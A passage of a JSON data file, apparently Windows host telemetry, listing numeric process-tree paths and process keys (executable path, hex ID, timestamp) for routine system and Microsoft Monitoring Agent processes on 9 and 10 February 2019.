/543/551\",\"1002/543/552\",\"1002/543/552/553\",\"1002/543/552/553/554\",\"1002/543/552/553/555\",\"1002/543/552/553/556\",\"1002/543/552/553/557\",\"1002/543/552/553/558\",\"1002/543/552/553/559\",\"1002/543/552/553/560\",\"1002/543/552/553/561\",\"1002/543/552/553/562\",\"1002/543/552/553/563\",\"1002/543/552/553/564\",\"1002/543/552/553/565\",\"1002/543/552/553/566\",\"1002/543/552/553/567\",\"1002/543/552/553/568\",\"1002/543/552/553/569\",\"1002/543/570\",\"1002/543/571\",\"1002/543/572\",\"1002/543/573\",\"1002/543/574\",\"1002/543/577\",\"1002/543/578\",\"1002/543/579\",\"1002/543/580\",\"1002/543/581\",\"1002/543/582\",\"1002/543/583\",\"1002/543/584\",\"1002/543/585\",\"1002/543/586\",\"1002/543/587\",\"1002/543/587/588\",\"1002/543/587/588/589\",\"1002/543/587/588/590\",\"1002/543/587/588/591\",\"1002/543/587/588/592\",\"1002/543/587/588/593\",\"1002/543/587/588/596\",\"1002/543/587/588/597\",\"1002/543/587/588/598\",\"1002/543/587/588/599\",\"1002/543/587/588/602\",\"1002/543/587/588/603\",\"1002/543/587/588/604\",\"1002/543/587/588/605\",\"1002/543/587/588/606\",\"1002/543/587/588/607\",\"1002/543/587/588/608\",\"1002/543/587/588/609\",\"1002/543/587/588/610\",\"1002/543/587/588/611\",\"1002/543/587/588/612\",\"1002/543/587/588/613\",\"1002/543/587/588/614\",\"1002/543/587/588/615\",\"1002/543/587/588/616\",\"1002/543/587/588/617\",\"1002/543/587/588/618\",\"1002/543/587/588/619\",\"1002/543/587/588/622\",\"1002/543/587/588/623\",\"1002/543/587/588/624\",\"1002/543/625\",\"1002/543/626\",\"1002/543/627\",\"1002/543/628\",\"1002/543/629\",\"1002/543/630\",\"1002/635\",\"1002/650\",\"1002/661\",\"1002/663\",\"1002/663/664\",\"1002/669\",\"1002/670\",\"1002/670/671\",\"1002/670/672\",\"1002/670/673\",\"1002/670/674\",\"1002/670/675\",\"1002/670/676\",\"1002/670/677\",\"1002/670/678\",\"1002/670/681\",\"1002/670/681/682\",\"1002/670/681/682/683\",\"1002/670/681/682/684\",\"1002/670/681/682/685\",\"1002/670/681/682/686\",\"1002/670/681/682/687\",\"1002/670/681/682/688\",\"1002/670/681/682/689\",\"1002/670/681/682/690\",\"1002/670/681/682/691\",\"1002/670/681/682/692\",\"1002/670/681/682/693\",\"1002/670/681/682/694\",\"1002/670/681/682/695\",\"1002/670/681/682/696\",\"1002/670/681/682/697\",\"1002/670/681/682/698\",\"1002/670/699\",\"1002/670/700\",\"1002/670/701\",\"1002/670/702\",\"1002/670/703\",\"1002/670/704\",\"1002/670/705\",\"1002/670/706\",\"1002/670/707\",\"1002/670/708\",\"1002/670/709\",\"1002/670/710\",\"1002/670/711\",\"1002/670/712\",\"1002/670/713\",\"1002/670/714\",\"1002/670/714/715\",\"1002/670/714/715/716\",\"1002/670/714/715/717\",\"1002/670/714/715/718\",\"1002/670/714/715/719\",\"1002/670/714/715/720\",\"1002/670/714/715/721\",\"1002/670/714/715/722\",\"1002/670/714/715/723\",\"1002/670/714/715/724\",\"1002/670/714/715/727\",\"1002/670/714/715/728\",\"1002/670/714/715/729\",\"1002/670/714/715/730\",\"1002/670/714/715/731\",\"1002/670/714/715/732\",\"1002/670/714/715/733\",\"1002/670/714/715/734\",\"1002/670/714/715/735\",\"1002/670/714/715/736\",\"1002/670/714/715/737\",\"1002/670/714/715/738\",\"1002/670/714/715/739\",\"1002/670/714/715/740\",\"1002/670/714/715/741\",\"1002/670/714/715/742\",\"1002/670/714/715/743\",\"1002/670/714/715/744\",\"1002/670/714/715/745\",\"1002/670/714/715/746\",\"1002/670/714/715/747\",\"1002/670/748\",\"1002/670/749\",\"1002/670/750\",\"1002/670/751\",\"1002/670/752\",\"1002/670/753\",\"1002/764\",\"1002/779\",\"1002/785\",\"1002/790\",\"1002/801\",\"1002/802\",\"1002/802/803\",\"1002/802/804\",\"1002/802/805\",\"1002/802/806\",\"1002/802/807\",\"1002/802/808\",\"1002/802/809\",\"1002/802/810\",\"1002/802/811\",\"1002/802/811/812\",\"1002/802/811/812/813\",\"1002/802/811/812/814\",\"1002/802/811/812/815\",\"1002/802/811/812/816\",\"1002/802/811/812/817\",\"1002/802/811/812/817/818\",\"1002/802/811/812/819\",\"1002/802/811/812/820\",\"1002/802/811/812/821\",\"1002/802/811/812/822\",\"1002/802/811/812/823\",\"1002/802/811/812/824\",\"1002/802/811/812/825\",\"1002/802/811/812/827\",\"1002/802/811/812/827/829\",\"1002/802/811/812/830\",\"1002/802/811/812/831\",\"1002/802/811/812/832\",\"1002/802/833\",\"1002/802/834\",\"1002/802/835\",\"1002/802/836\",\"1002/802/837\",\"1002/802/838\",\"1002/802/839\",\"1002/802/840\",\"1002/802/841\",\"1002/802/842\",\"1002/802/843\",\"1002/802/844\",\"1002/802/845\",\"1002/802/846\",\"1002/802/847\",\"1002/802/848\",\"1002/802/848/849\",\"1002/802/848/849/850\",\"1002/802/848/849/851\",\"1002/802/848/849/852\",\"1002/802/848/849/855\",\"1002/802/848/849/856\",\"1002/802/848/849/857\",\"1002/802/848/849/858\",\"1002/802/848/849/859\",\"1002/802/848/849/860\",\"1002/802/848/849/861\",\"1002/802/848/849/862\",\"1002/802/848/849/863\",\"1002/802/848/849/864\",\"1002/802/848/849/865\",\"1002/802/848/849/866\",\"1002/802/848/849/867\",\"1002/802/848/849/868\",\"1002/802/848/849/869\",\"1002/802/848/849/870\",\"1002/802/848/849/871\",\"1002/802/848/849/872\",\"1002/802/848/849/873\",\"1002/802/848/849/874\",\"1002/802/848/849/875\",\"1002/802/848/849/876\",\"1002/802/848/849/877\",\"1002/802/848/849/878\",\"1002/802/848/849/879\",\"1002/802/848/849/880\",\"1002/802/848/849/881\",\"1002/802/882\",\"1002/802/883\",\"1002/802/884\",\"1002/802/885\",\"1002/802/886\",\"1002/802/887\",\"1002/888\",\"1002/899\",\"1002/904\",\"1002/904/905\",\"1002/916\",\"1002/92\",\"1002/923\",\"1002/932\",\"1002/933\",\"1002/933/934\",\"1002/933/935\",\"1002/933/936\",\"1002/933/937\",\"1002/933/938\",\"1002/933/939\",\"1002/933/940\",\"1002/933/941\",\"1002/933/946\",\"1002/933/947\",\"1002/933/948\",\"1002/933/949\",\"1002/933/950\",\"1002/933/951\",\"1002/933/952\",\"1002/933/953\",\"1002/933/954\",\"1002/933/955\",\"1002/933/956\",\"1002/933/957\",\"1002/933/958\",\"1002/933/959\",\"1002/933/960\",\"1002/933/961\",\"1002/933/962\",\"1002/933/962/963\",\"1002/933/962/963/964\",\"1002/933/962/963/965\",\"1002/933/962/963/966\",\"1002/933/962/963/967\",\"1002/933/962/963/968\",\"1002/933/962/963/969\",\"1002/933/962/963/970\",\"1002/933/962/963/971\",\"1002/933/962/963/972\",\"1002/933/962/963/973\",\"1002/933/962/963/974\",\"1002/933/962/963/975\",\"1002/933/962/963/976\",\"1002/933/962/963/977\",\"1002/933/962/963/978\",\"1002/933/962/963/979\",\"1002/933/962/963/980\",\"1002/933/962/963/981\",\"1002/933/962/963/982\",\"1002/933/962/963/983\",\"1002/933/962/963/984\",\"1002/933/962/963/985\",\"1002/933/962/963/986\",\"1002/933/962/963/987\",\"1002/933/962/963/988\",\"1002/933/962/963/989\",\"1002/933/962/963/990\",\"1002/933/962/963/991\",\"1002/933/962/963/992\",\"1002/933/962/963/993\",\"1002/933/994\",\"1002/933/995\",\"1002/933/996\",\"1002/933/997\",\"1002/933/998\",\"1002/933/999\",\"1003\",\"1003/101\",\"1003/132\",\"1003/176\",\"1003/190\",\"1003/230\",\"1003/339\",\"1003/346\",\"1003/359\",\"1003/382\",\"1003/4\",\"1003/492\",\"1003/497\",\"1003/514\",\"1003/517\",\"1003/535\",\"1003/539\",\"1003/648\",\"1003/667\",\"1003/72\",\"1003/762\",\"1003/777\",\"1003/780\",\"1003/797\",\"1003/897\",\"1003/914\",\"1003/930\",\"1004\",\"1004/10\",\"1004/10/11\",\"1004/107\",\"1004/107/108\",\"1004/120\",\"1004/120/121\",\"1004/127\",\"1004/127/128\",\"1004/129\",\"1004/129/130\",\"1004/139\",\"1004/139/140\",\"1004/15\",\"1004/15/16\",\"1004/5\",\"1004/5/6\",\"1004/67\",\"1004/67/68\",\"1004/76\",\"1004/76/77\",\"1004/78\",\"1004/78/79\",\"1004/8\",\"1004/8/9\",\"1005\",\"1005/12\",\"1005/12/13\",\"1006\",\"1006/54\",\"1006/55\",\"1006/56\",\"1006/57\",\"1006/58\",\"1006/59\",\"1006/60\",\"1007\",\"1007/103\",\"1007/103/104\",\"1007/103/105\",\"1007/103/105/106\",\"1007/123\",\"1007/123/124\",\"1007/134\",\"1007/134/135\",\"1007/134/136\",\"1007/134/136/137\",\"1007/343\",\"1007/343/344\",\"1007/343/349\",\"1007/343/349/350\",\"1007/364\",\"1007/364/365\",\"1007/364/366\",\"1007/364/366/367\",\"1007/385\",\"1007/385/386\",\"1007/385/387\",\"1007/385/387/388\",\"1007/502\",\"1007/502/503\",\"1007/502/504\",\"1007/502/504/505\",\"1007/520\",\"1007/520/521\",\"1007/520/526\",\"1007/520/526/527\",\"1007/530\",\"1007/530/531\",\"1007/594\",\"1007/594/595\",\"1007/594/620\",\"1007/594/620/621\",\"1007/640\",\"1007/640/641\",\"1007/640/642\",\"1007/640/642/643\",\"1007/655\",\"1007/655/656\",\"1007/655/657\",\"1007/655/657/658\",\"1007/69\",\"1007/69/70\",\"1007/69/74\",\"1007/69/74/75\",\"1007/756\",\"1007/756/757\",\"1007/756/758\",\"1007/756/758/759\",\"1007/771\",\"1007/771/772\",\"1007/771/773\",\"1007/771/773/774\",\"1007/788\",\"1007/788/789\",\"1007/791\",\"1007/791/792\",\"1007/791/793\",\"1007/791/793/794\",\"1007/889\",\"1007/889/890\",\"1007/889/895\",\"1007/889/895/896\",\"1007/910\",\"1007/910/911\",\"1007/910/912\",\"1007/910/912/913\",\"1007/926\",\"1007/926/927\",\"1007/926/928\",\"1007/926/928/929\",\"1008\",\"1008/81\",\"1008/81/82\",\"1008/81/84\",\"1008/81/84/97\",\"1008/81/84/97/99\",\"1008/83\",\"1008/83/86\",\"1008/83/88\",\"1008/85\",\"1008/85/87\",\"1008/93\",\"1008/94\",\"1008/94/95\",\"1008/94/96\",\"1009\",\"1009/208\",\"1009/377\",\"1009/89\",\"1009/89/90\",\"1009/89/90/91\",\"1009/98\"],\"proc_key\":[\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0xda42019-02-09 20:04:38.017000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0xed82019-02-09 23:13:26.497000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x1b742019-02-09 23:13:35.410000\",\"c:\\\\windows\\\\system32\\\\dllhost.exe0x1da82019-02-09 23:26:47.703000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x22c82019-02-09 23:35:53.160000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x15582019-02-10 00:14:15.737000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0xa242019-02-10 00:14:24.700000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x4602019-02-10 00:35:53.187000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\windows\\\\system32\\\\unlodctr.exe0x8f02019-02-10 00:45:28.780000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x9342019-02-10 00:45:28.793000\",\"c:\\\\windows\\\\microsoft.net\\\\framework64\\\\v4.0.30319\\\\csc.exe0x11582019-02-10 00:45:30.153000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x18742019-02-10 00:45:30.293000\",\"c:\\\\windows\\\\microsoft.net\\\\framework64\\\\v4.0.30319\\\\cvtres.exe0x12cc2019-02-10 00:45:30.457000\",\"c:\\\\windows\\\\system32\\\\lodctr.exe0x20b42019-02-10 00:45:30.290000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x16342019-02-10 00:45:30.373000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22c02019-02-10 00:45:30.653000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xef42019-02-10 00:45:30.693000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1af02019-02-10 00:45:30.720000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1e802019-02-10 00:45:30.760000\",\"c:\\\\windows\\\\system32\\\\werfault.exe0xf542019-02-10 00:45:30.803000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x6442019-02-10 00:45:36.180000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xdd02019-02-10 00:45:36.187000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x12902019-02-10 00:45:36.287000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x12f02019-02-10 00:45:36.297000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x22742019-02-10 00:45:38.023000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x84c2019-02-10 00:45:38.033000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x91c2019-02-10 00:46:28.000000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x10582019-02-10 00:46:28.010000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0xf102019-02-10 00:48:32.793000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x13982019-02-10 00:48:32.810000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\mof\\\\mofwriter.exe0x1a002019-02-10 00:57:36.083000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xc1c2019-02-10 00:57:36.103000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\dsc\\\\asmhost.exe0xe102019-02-10 00:57:36.167000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1f3c2019-02-10 00:57:36.213000\",\"c:\\\\windows\\\\system32\\\\secedit.exe0xd442019-02-10 00:59:27.207000\",\"c:\\\\windows\\\\system32\\\\secedit.exe0x12902019-02-10 00:59:29.590000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x12f82019-02-10 01:15:36.257000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x10502019-02-10 01:15:36.273000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3473\\\\webbinaries\\\\microsoft.sirona.oms.security.baselineassessment.exe0xbd82019-02-10 01:30:36.103000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x19f42019-02-10 01:30:36.127000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0xf602019-02-10 01:45:36.263000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1af02019-02-10 01:45:36.333000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0x8c42019-02-10 01:48:32.220000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x10042019-02-10 01:48:32.230000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0xb102019-02-10 02:15:36.263000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x4d02019-02-10 02:15:36.287000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x17e02019-02-10 02:25:36.270000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x8ac2019-02-10 02:25:36.283000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x15b82019-02-10 02:45:36.250000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xa282019-02-10 02:45:36.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0xec02019-02-10 02:48:32.223000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1bc02019-02-10 02:48:32.233000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0xdd02019-02-10 03:15:36.260000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1f602019-02-10 03:15:36.273000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x22dc2019-02-10 03:15:36.277000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1b642019-02-10 03:15:36.320000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x8382019-02-10 03:45:36.253000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x15902019-02-10 03:45:36.267000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0xe2c2019-02-10 03:48:32.237000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x14682019-02-10 03:48:32.253000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x16e02019-02-10 04:05:36.257000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xf3c2019-02-10 04:05:36.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x1c842019-02-10 04:15:36.253000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x195c2019-02-10 04:15:36.280000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x1b642019-02-10 04:45:36.263000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1b382019-02-10 04:45:36.277000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0x6902019-02-10 04:48:32.243000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xd5c2019-02-10 04:48:32.250000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x1c202019-02-10 04:55:36.263000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x9642019-02-10 04:55:36.273000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x12802019-02-10 05:15:36.267000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x23b82019-02-10 05:15:36.283000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x6502019-02-10 05:45:36.270000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x11ec2019-02-10 05:45:36.283000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x15842019-02-10 05:45:36.283000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x8382019-02-10 05:45:36.290000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0x4902019-02-10 05:48:32.250000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x8642019-02-10 05:48:32.260000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0xfc02019-02-10 06:15:36.260000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x203c2019-02-10 06:15:36.280000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0xa142019-02-10 06:35:36.250000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x21cc2019-02-10 06:35:36.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x1ce42019-02-10 06:45:36.267000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1bd02019-02-10 06:45:36.277000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0xcc82019-02-10 06:48:32.257000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x15702019-02-10 06:48:32.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x8f82019-02-10 07:15:36.270000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x19ac2019-02-10 07:15:36.300000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x16142019-02-10 07:25:36.253000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x118c2019-02-10 07:25:36.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x18502019-02-10 07:45:36.253000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xcc82019-02-10 07:45:36.273000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0x16102019-02-10 07:48:32.257000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xde42019-02-10 07:48:32.267000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x10802019-02-10 08:15:36.267000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x11782019-02-10 08:15:36.287000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x12482019-02-10 08:15:36.277000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x7702019-02-10 08:15:36.290000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x10442019-02-10 08:45:36.260000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x202c2019-02-10 08:45:36.277000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0xf082019-02-10 08:48:32.283000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x94c2019-02-10 08:48:32.290000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0xa782019-02-10 09:05:36.250000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x11d82019-02-10 09:05:36.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0xd742019-02-10 09:15:36.273000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xd042019-02-10 09:15:36.287000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x23d82019-02-10 09:45:36.263000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x8ac2019-02-10 09:45:36.277000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0x3f82019-02-10 09:48:32.293000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1f382019-02-10 09:48:32.303000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x23b82019-02-10 09:55:36.287000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x15e42019-02-10 09:55:36.297000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x15482019-02-10 10:15:36.273000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x128c2019-02-10 10:15:36.290000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x10a82019-02-10 10:45:36.257000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x9642019-02-10 10:45:36.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x5a82019-02-10 10:45:36.270000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x18982019-02-10 10:45:36.277000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0xf882019-02-10 10:48:32.310000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xe082019-02-10 10:48:32.317000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x18b82019-02-10 11:15:36.250000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x14542019-02-10 11:15:36.267000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x16e82019-02-10 11:35:36.263000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x11842019-02-10 11:35:36.277000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x1d042019-02-10 11:45:36.270000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xe302019-02-10 11:45:36.287000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0xda82019-02-10 11:48:32.317000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1fa82019-02-10 11:48:32.323000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x1f202019-02-10 12:15:36.263000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xfc42019-02-10 12:15:36.280000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0xe3c2019-02-10 12:25:36.257000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x6042019-02-10 12:25:36.267000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x1fa42019-02-10 12:45:36.267000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xf942019-02-10 12:45:36.377000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0x220c2019-02-10 12:48:32.333000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x22882019-02-10 12:48:32.347000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x6502019-02-10 13:15:36.250000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xae42019-02-10 13:15:36.267000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x15702019-02-10 13:15:36.263000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x16c02019-02-10 13:15:36.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0xf602019-02-10 13:45:36.253000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x134c2019-02-10 13:45:36.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service 